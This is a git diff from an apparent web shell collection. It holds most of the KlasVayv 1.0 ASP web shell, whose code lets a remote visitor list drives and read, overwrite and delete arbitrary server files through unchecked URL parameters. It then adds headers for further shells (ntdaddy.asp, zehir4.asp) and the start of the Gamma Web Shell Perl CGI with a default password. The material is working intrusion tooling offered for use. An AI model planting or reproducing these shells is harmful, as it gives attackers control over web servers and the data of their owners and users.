</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="174">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000" height="19"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#C5C5C5" height="134">
|
||||
<form method="POST" action="klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>" name="klaspos">
|
||||
<p align="center"><font
|
||||
color="#FFFFFF" size="1" face="Arial">
|
||||
<input
|
||||
type="text" size="37" maxlength="32"
|
||||
name="duzenx" value="Klasör Adý"
|
||||
class="search"
|
||||
onblur="if (this.value == '') this.value = 'Kullanýcý'"
|
||||
onfocus="if (this.value == 'Kullanýcý') this.value=''"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center">
|
||||
<br>
|
||||
<br>
|
||||
<br>
|
||||
</font>
|
||||
<span class="gensmall">
|
||||
<input type="submit" size="16"
|
||||
name="duzenx1" value="Oluþtur"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||
</font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000" height="19"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("suruculer") <> "" then
|
||||
%>
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
AventGrup©<br>
|
||||
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KlasVayv 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="4">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="4">
|
||||
<span style="font-size: 2pt"> </span></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="153">
|
||||
<tr>
|
||||
<td width="100%" height="19" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" height="113" bgcolor="#E1E1E1"> <div align="center">
|
||||
<center>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber2" height="17">
|
||||
<tr>
|
||||
<td width="208" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Sürücü Adý</font></td>
|
||||
<td width="75" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Boyutu</font></td>
|
||||
<td width="75" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Boþ Alan</font></td>
|
||||
<td width="64" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Durum</font></td>
|
||||
<td width="62" height="17" align="center" bgcolor="#C5C5C5">
|
||||
<font face="Verdana" style="font-size: 8pt">Ýþlem</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</center>
|
||||
</div>
|
||||
<div align="center">
|
||||
<center>
|
||||
|
||||
|
||||
<%
|
||||
set klassis =server.createobject("scripting.filesystemobject")
|
||||
set klasdri=klassis.drives
|
||||
%>
|
||||
|
||||
<%
|
||||
for each dongu in klasdri
|
||||
%>
|
||||
|
||||
<%
|
||||
if dongu.driveletter <> "A" then
|
||||
if dongu.isready=true then
|
||||
%>
|
||||
|
||||
<%
|
||||
select case dongu.drivetype
|
||||
case 0 teype="Diðer"
|
||||
case 1 teype="Taþýnýr"
|
||||
case 2 teype="HDD"
|
||||
case 3 teype="NetWork"
|
||||
case 4 teype="CD-Rom"
|
||||
case 5 teype="FlashMem"
|
||||
end select
|
||||
%>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber3" height="17">
|
||||
<tr>
|
||||
<td width="208" height="17" align="left" bgcolor="#EEEEEE">
|
||||
<font face="Verdana" style="font-size: 8pt"> <%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> )</font></td>
|
||||
<td width="75" height="17" align="center" bgcolor="#E0E0E0">
|
||||
<font face="Verdana" style="font-size: 8pt"><%=Round(dongu.totalsize/(1024*1024),1)%> MB</font></td>
|
||||
<td width="75" height="17" align="center" bgcolor="#E0E0E0">
|
||||
<font face="Verdana" style="font-size: 8pt"><%=Round(dongu.availablespace/(1024*1024),1)%> MB</font></td>
|
||||
<td width="64" height="17" align="center" bgcolor="#E0E0E0">
|
||||
<font face="Verdana" style="font-size: 8pt"><%=teype%> </font></td>
|
||||
<td width="62" height="17" align="center" bgcolor="#E0E0E0">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber24">
|
||||
<tr>
|
||||
<td width="62" height="17" align="center" bgcolor="#E0E0E0"
|
||||
onmouseover="this.style.background='#A0A0A0'"
|
||||
onmouseout="this.style.background='#E0E0E0'"
|
||||
style="CURSOR: hand"
|
||||
|
||||
>
|
||||
<a href="klasvayv.asp?klas=<%=dongu.driveletter%>:\" style="text-decoration: none">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#000000">Gir</font></a></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<%
|
||||
end if
|
||||
end if
|
||||
%>
|
||||
<%
|
||||
next
|
||||
%>
|
||||
|
||||
|
||||
|
||||
</center>
|
||||
</div>
|
||||
<div align="center">
|
||||
<center>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber4" height="4">
|
||||
<tr>
|
||||
<td width="484" height="4" align="center" bgcolor="#C5C5C5">
|
||||
<span style="font-size: 2pt"> </span></td>
|
||||
</tr>
|
||||
</table>
|
||||
</center>
|
||||
</div>
|
||||
<p> </p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" height="19" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("kaydet") <> "" then
|
||||
set dossisx=server.createobject("scripting.filesystemobject")
|
||||
set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true)
|
||||
dosx.write request("duzenx")
|
||||
dosx.close
|
||||
set dosyax=nothing
|
||||
set dossisx=nothing
|
||||
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("duzenle") <> "" then
|
||||
set dossis=server.createobject("scripting.filesystemobject")
|
||||
set dos=dossis.opentextfile(request.querystring("duzenle"), 1)
|
||||
sedx = dos.readall
|
||||
dos.close
|
||||
set dosya=nothing
|
||||
set dossis=nothing
|
||||
|
||||
set aktifklas=request.querystring("klas")
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
AventGrup©<br>
|
||||
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KlasVayv 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Dosya</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <%=response.write(request.querystring("duzenle"))%></font></td>
|
||||
<td width="65">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000">
|
||||
<form method="POST" action="klasvayv.asp?kaydet=<%=request.querystring("duzenle")%>&klas=<%=aktifklas%>" name="kaypos">
|
||||
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
|
||||
<textarea name="duzenx"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
|
||||
|
||||
|
||||
rows="24" cols="163" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||
</font></b></p>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
|
||||
<tr>
|
||||
<td width="100%" align="right">
|
||||
<p align="center">
|
||||
<span class="gensmall">
|
||||
<input type="submit" size="16"
|
||||
name="duzenx1" value="Kaydet"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span><a href="klasvayv.asp"><input type="reset" size="16"
|
||||
name="x" value="Vazgeç"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span></a></td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#EAEAEA">
|
||||
<p align="right">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
<%
|
||||
|
||||
if request.querystring("klas") <> "" then
|
||||
aktifklas=Request.querystring("klas")
|
||||
if request.querystring("usak") = "1" then
|
||||
aktifklas=aktifklas & "\"
|
||||
end if
|
||||
|
||||
else
|
||||
aktifklas=server.mappath("/")
|
||||
aktifklas=aktifklas & "\"
|
||||
end if
|
||||
|
||||
if request.querystring("silklas") <> "" then
|
||||
set sis=createobject("scripting.filesystemobject")
|
||||
silincekklas=request.querystring("silklas")
|
||||
sis.deletefolder(silincekklas)
|
||||
set sis=nothing
|
||||
'response.write(sil & " Silindi")
|
||||
end if
|
||||
|
||||
if request.querystring("sildos") <> "" then
|
||||
silincekdos=request.querystring("sildos")
|
||||
set dosx=createobject("scripting.filesystemobject")
|
||||
set dos=dosx.getfile(silincekdos)
|
||||
dos.delete
|
||||
set dos=nothing
|
||||
set dosyasis=nothing
|
||||
end if
|
||||
|
||||
|
||||
|
||||
|
||||
select case aktifklas
|
||||
case "C:" aktifklas="C:\"
|
||||
case "D:" aktifklas="D:\"
|
||||
case "E:" aktifklas="E:\"
|
||||
case "F:" aktifklas="F:\"
|
||||
case "G:" aktifklas="G:\"
|
||||
case "H:" aktifklas="H:\"
|
||||
case "I:" aktifklas="I:\"
|
||||
case "J:" aktifklas="J:\"
|
||||
case "K:" aktifklas="K:\"
|
||||
end select
|
||||
|
||||
|
||||
|
||||
if aktifklas=("C:") then aktifklas=("C:\")
|
||||
|
||||
Set FS = CreateObject("Scripting.FileSystemObject")
|
||||
Set klasor = FS.GetFolder(aktifklas)
|
||||
Set altklasorler = klasor.SubFolders
|
||||
Set dosyalar = klasor.files
|
||||
%>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
AventGrup©<br>
|
||||
</span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KlasVayv 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
|
||||
<font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Klasör</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <%=response.write(aktifklas)%></font></td>
|
||||
<td width="65">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13">
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
|
||||
<a href="klasvayv.asp?usklas=1&klas=<%=server.urlencode(left(aktifklas,(instrRev(aktifklas,"\"))-1))%>" style="text-decoration: none">
|
||||
<font color="#000000">Üst Klasör</font></a></font></td>
|
||||
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
|
||||
<tr>
|
||||
<td width="625" bgcolor="#000000"><span style="font-size: 2pt"> </span></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td bgcolor="#000000" height="20">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F"
|
||||
onmouseover="style.background='#6F6F6F'"
|
||||
onmouseout="style.background='#5F5F5F'"
|
||||
style="CURSOR: hand"
|
||||
|
||||
height="19" bordercolor="#000000">
|
||||
<span style="font-weight: 700">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="klasvayv.asp?suruculer=1" style="text-decoration: none">
|
||||
<font color="#9F9F9F">Sürücüler</font></a></font></span></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19"
|
||||
onmouseover="style.background='#6F6F6F'"
|
||||
onmouseout="style.background='#5F5F5F'"
|
||||
style="CURSOR: hand"
|
||||
bordercolor="#000000">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
|
||||
<a href="klasvayv.asp?klasac=1&aktifklas=<%=aktifklas%>" style="text-decoration: none">
|
||||
<font color="#9F9F9F">Yeni Klasör</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19"
|
||||
onmouseover="style.background='#6F6F6F'"
|
||||
onmouseout="style.background='#5F5F5F'"
|
||||
style="CURSOR: hand"
|
||||
bordercolor="#000000">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
|
||||
<a href="klasvayv.asp?yenidosya=<%=aktifklas%>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
|
||||
<tr>
|
||||
<td width="30" height="17" bgcolor="#9F9F9F">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> Tür</font></td>
|
||||
<td height="17" bgcolor="#9F9F9F">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> Dosya
|
||||
Adý</font></td>
|
||||
<td width="122" height="17" bgcolor="#9F9F9F">
|
||||
<p align="center">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> Ýþlem</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<% For each oge in altklasorler %>
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
|
||||
<tr>
|
||||
<td width="30" height="17" bgcolor="#808080">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
|
||||
<td height="17" bgcolor="#C4C4C4">
|
||||
<font face="Verdana" style="font-size: 8pt"> <%=oge.name%> </font></td>
|
||||
<td width="61" height="17" bgcolor="#C4C4C4" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#A3A3A3"
|
||||
onmouseover="this.style.background='#BBBBBB'"
|
||||
onmouseout="this.style.background='#A3A3A3'"
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a href="klasvayv.asp?klas=<%=aktifklas%><%=oge.name%>\" style="text-decoration: none">
|
||||
<font color="#000000">Aç</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td width="60" height="17" bgcolor="#C4C4C4" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#A3A3A3"
|
||||
onmouseover="this.style.background='#BBBBBB'"
|
||||
onmouseout="this.style.background='#A3A3A3'"
|
||||
|
||||
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a href="klasvayv.asp?silklas=<%=aktifklas & oge.name & "&klas=" & aktifklas %>" style="text-decoration: none">
|
||||
<font color="#000000">Sil</font></a>
|
||||
|
||||
</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<% Next %>
|
||||
|
||||
|
||||
<% For each oge in dosyalar %>
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
|
||||
<tr>
|
||||
<td width="30" height="1" bgcolor="#B0B0B0">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
|
||||
<td height="1" bgcolor="#EAEAEA">
|
||||
<font face="Verdana" style="font-size: 8pt"> <%=oge.name%> </font>
|
||||
<font face="Arial Narrow" style="font-size: 8pt"> ( <%=Round(oge.size/1024,1)%> KB ) </font></td>
|
||||
<td width="61" height="1" bgcolor="#D6D6D6" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#D6D6D6" no wrap
|
||||
onmouseover="this.style.background='#ACACAC'"
|
||||
onmouseout="this.style.background='#D6D6D6'"
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a style="text-decoration: none" target="_self" href="klasvayv.asp?duzenle=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>">
|
||||
<font color="#000000">Düzenle</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td width="60" height="1" bgcolor="#D6D6D6" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#D6D6D6" no wrap
|
||||
onmouseover="this.style.background='#ACACAC'"
|
||||
onmouseout="this.style.background='#D6D6D6'"
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a href="klasvayv.asp?sildos=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>" style="text-decoration: none">
|
||||
<font color="#000000">Sil</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<% Next %>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if aktifklas=("C:\") then aktifklas=("C:")
|
||||
%>
|
||||
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
1012
xakep-shells/ASP/ntdaddy.asp.txt
Normal file
1012
xakep-shells/ASP/ntdaddy.asp.txt
Normal file
File diff suppressed because it is too large
Load diff
1190
xakep-shells/ASP/zehir4.asp.txt
Normal file
1190
xakep-shells/ASP/zehir4.asp.txt
Normal file
File diff suppressed because it is too large
Load diff
869
xakep-shells/CGI/WebShell.cgi.txt
Normal file
869
xakep-shells/CGI/WebShell.cgi.txt
Normal file
|
@ -0,0 +1,869 @@
|
|||
#!/usr/bin/perl
|
||||
###############################################################################
|
||||
### Gamma Web Shell
|
||||
### Copyright 2003 Gamma Group
|
||||
### All rights reserved
|
||||
###
|
||||
### Gamma Web Shell is free for both commercial and non commercial
|
||||
### use. You may modify this script as you find necessary as long
|
||||
### as you do not sell it. Redistribution is not allowed without
|
||||
### prior consent from Gamma Group (support@gammacenter.com).
|
||||
###
|
||||
### Gamma Group <http://www.gammacenter.com>
|
||||
###
|
||||
|
||||
use strict;
|
||||
|
||||
###############################################################################
|
||||
|
||||
package WebShell::Configuration;
|
||||
|
||||
use vars qw($password $restricted_mode $ok_commands);
|
||||
|
||||
##
|
||||
## Password.
|
||||
## Set to blank if you don't need password protection.
|
||||
##
|
||||
$password = "changeme";
|
||||
|
||||
##
|
||||
## Restricted mode.
|
||||
## Set to "1" to allow only a limited set of commands.
|
||||
##
|
||||
$restricted_mode = 0;
|
||||
|
||||
##
|
||||
## Available commands.
|
||||
## The list of available commands for the restricted mode.
|
||||
##
|
||||
$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];
|
||||
|
||||
###############################################################################
|
||||
|
||||
package WebShell::Templates;
|
||||
|
||||
use vars qw($LOGIN_TEMPLATE $INPUT_TEMPLATE $EXECUTE_TEMPLATE $BROWSE_TEMPLATE);
|
||||
|
||||
